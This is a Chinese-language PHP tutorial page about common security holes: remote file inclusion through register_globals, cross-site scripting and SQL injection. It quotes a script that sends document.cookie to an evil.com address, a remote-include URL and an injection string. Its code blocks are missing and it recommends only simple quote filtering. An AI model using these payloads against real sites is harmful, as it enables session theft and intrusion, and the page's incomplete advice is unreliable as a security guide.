来源:自学PHP网 时间:2014-11-27 22:16 作者: 阅读:次
[导读] 程序代码的安全是一个程序员对开发的应用方面的多方面的素质体现,下面我来总结一下自己的经验,有需要了解朋友可参考一下.百度一下,设定open_basedir后只有指定的目录和子目录下的...
php中一些安全隐藏代码总结程序代码的安全是一个程序员对开发的应用方面的多方面的素质体现,下面我来总结一下自己的经验,有需要了解朋友可参考一下. 百度一下,设定open_basedir后只有指定的目录和子目录下的php脚本才会被执行,用php读取open_basedir以外的目录或文件会报错,权限不足一般虚拟主机供应商都是设定为/tmp和/home,这是用户习惯了,我们要想办法解决这些问题了,下面总结了一些php安全问题. 1.include的时候要小心,要判断你本地是否有这个文件,以免造成安全漏洞,比如如下 代码:
这里假设$module是function全局变量,这个脚本让攻击者有机会在你的服务器上执行任何的php代码,比如他在浏览器url后面加上?module=http://example.com/my就行了。当php接收到这个url的时候,脚本中的"$module"变量的值将被设置为http://example.com/my,因此当php执行include的时候就很危险了...... 解决办法:关闭php.ini中的register_globals或include的时候判断一下,代码如下:
2.跨站运行脚本 简单的说是攻击者可以在用户的浏览器端执行一些客户端的脚本,例如js,然后盗取用户的cookies或其他重要数据. 比如<script language='javaScript'>document.location=?'http://evil.com/cgi-bin/cookie.cgi?f='+document.cookie</script> 如果你点击了按钮,你本地的cookie信息将会被发送的某个人的邮箱,由此可见你想做个盗取用户信息的网站是多么容易. 3.SQL注入 个人觉得是sql自身的灵活,易用给自己带来的负面影响,代码如下:
比如用人写了:http://example.com/login.php?user=admin'%20OR%20(user='&pwd=')%20R%20user=' 你的php代码可能变成如下:
可以用函数进行过滤,过滤掉(') ("),()等等. |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com